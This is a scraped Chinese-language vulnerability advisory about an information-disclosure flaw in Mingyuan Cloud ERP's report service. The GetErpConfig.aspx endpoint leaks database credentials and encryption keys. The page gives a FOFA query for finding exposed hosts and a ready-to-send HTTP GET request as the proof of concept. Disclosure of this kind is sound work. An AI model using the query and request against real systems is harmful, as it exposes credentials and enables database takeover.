当前位置: 首页 > news >正文

明源云ERP报表服务GetErpConfig.aspx接口存在敏感信息泄露

一、漏洞简介

在访问 /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 路径时,返回了包含敏感信息的响应。这些信息包括但不限于数据库连接字符串、用户名、密码、加密密钥等。这些敏感信息的暴露可能导致以下风险:数据库访问风险:攻击者可以利用数据库连接字符串中的用户名和密码直接访问数据库,从而获取或篡改敏感数据。加密风险:攻击者可以利用加密密钥解密或篡改加密数据,导致数据泄露或数据完整性受损。系统管理风险:攻击者可以利用管理员用户代码进行系统管理操作,进一步扩大攻击范围。

二、漏洞影响


三、网络测绘:

fofa:
body="报表服务已正常运行"

在这里插入图片描述

四、复现过程

前置条件

前台

首页

在这里插入图片描述

步骤 POC 1

数据包

GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close

http://www.mrgr.cn/news/55669.html

相关文章:

  • VSCode编译器改为中文
  • 24/10/14 算法笔记 循环神经网络RNN
  • 反弹Shell
  • linux线程 | 同步与互斥 | 线程池以及知识点补充
  • 把其他.ui文件拿到我的工程中使用
  • Valkan(1·简介,环境搭建)
  • java时间类--Period时间差计算场景2-年月日时分秒
  • Springboot项目控制层注释
  • Axure大屏可视化模板:打造跨领域数据分析平台的原型设计案例
  • 10月20日
  • PMP敏捷专题课:敏捷实践指南
  • pushgateway的快速使用教程(附Java版通用推送代码)
  • EWM 库存盘点
  • 数组转List
  • Python机器学习中的主成分分析(PCA)全面解析与应用
  • jmeter学习(8)界面的使用
  • 旧电脑安装Win11提示“这台电脑当前不满足windows11系统要求”,安装中断。怎么办?
  • 比亚迪智驾变阵:整合自研,冲刺量产,目标让10万级也搭NOA
  • 红队老子养成记3 - 学会反弹shell的多种姿势,拿shell拿手软!!(全网最多姿势!)
  • IO编程——消息队列
  • 【H2O2|全栈】JS入门知识(五)
  • 碰到这个问题请更新或重新安装fastapi版本
  • 时序分解 | Matlab实现EEMD+SE集合经验模态分解+样本熵计算的时间序列信号分解
  • Android 性能之 Game Mode
  • 基于微信小程序的驾校预约系统设计与实现
  • P3924 康娜的线段树